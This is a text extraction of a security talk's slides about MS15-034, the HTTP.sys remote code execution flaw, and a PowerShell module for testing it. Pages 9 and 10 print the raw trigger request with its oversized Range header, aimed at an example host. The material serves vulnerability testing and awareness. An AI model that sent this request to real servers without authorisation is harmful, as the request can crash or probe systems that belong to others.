14
EXPLOITING MS15-034 IN POWERSHELL KIERAN JACOBSEN TECHNICAL LEAD - READIFY @KJACOBSEN – POSHSECURITY.COM

Exploiting MS15-034 In PowerShell

Embed Size (px)

Citation preview

Page 1: Exploiting MS15-034 In PowerShell

EXPLOITING MS15-034 IN POWERSHELL

KIERAN JACOBSENTECHNICAL LEAD - READIFY

@KJACOBSEN – POSHSECURITY.COM

Page 2: Exploiting MS15-034 In PowerShell

‘REMOTE CODE EXECUTION’ -IN HTTP.SYS

Page 3: Exploiting MS15-034 In PowerShell

IF THE BAD GUY CAN EXECUTE CODE ON YOUR BOX, IT ISN’T YOUR BOX

ANYMORE.

Page 4: Exploiting MS15-034 In PowerShell

HTTP.SYS IS EVERYWHERE

Page 5: Exploiting MS15-034 In PowerShell

IIS KERNEL CACHING MODULE

Page 6: Exploiting MS15-034 In PowerShell
Page 7: Exploiting MS15-034 In PowerShell

ARE WE VULNERABLE?

Page 8: Exploiting MS15-034 In PowerShell

REQUEST -> RESPONSE

Page 9: Exploiting MS15-034 In PowerShell

GET / HTTP/1.1HOST: GOOGLE.COMRANGE: BYTES=0-18446744073709551615CONNECTION: CLOSE

Page 10: Exploiting MS15-034 In PowerShell

GET / HTTP/1.1`R`NHOST: GOOGLE.COM`R`NRANGE: BYTES=0-18446744073709551615`R`NCONNECTION: CLOSE `R`N`R`N

Page 11: Exploiting MS15-034 In PowerShell

STREAMS

Page 12: Exploiting MS15-034 In PowerShell

WORKING WITH TCP

Page 13: Exploiting MS15-034 In PowerShell

MS15034.PSM1

Page 14: Exploiting MS15-034 In PowerShell

MORE INFORMATION

• MY WEBSITE – HTTP://POSHSECURITY.COM• TWITTER - @KJACOBSEN• MS15-034 MODULE – HTTP://GITHUB.COM/POSHSECURITY/MS15034 • MICROSOFT SECURITY BULLETIN - HTTPS://

TECHNET.MICROSOFT.COM/EN-US/LIBRARY/SECURITY/MS15-034.ASPX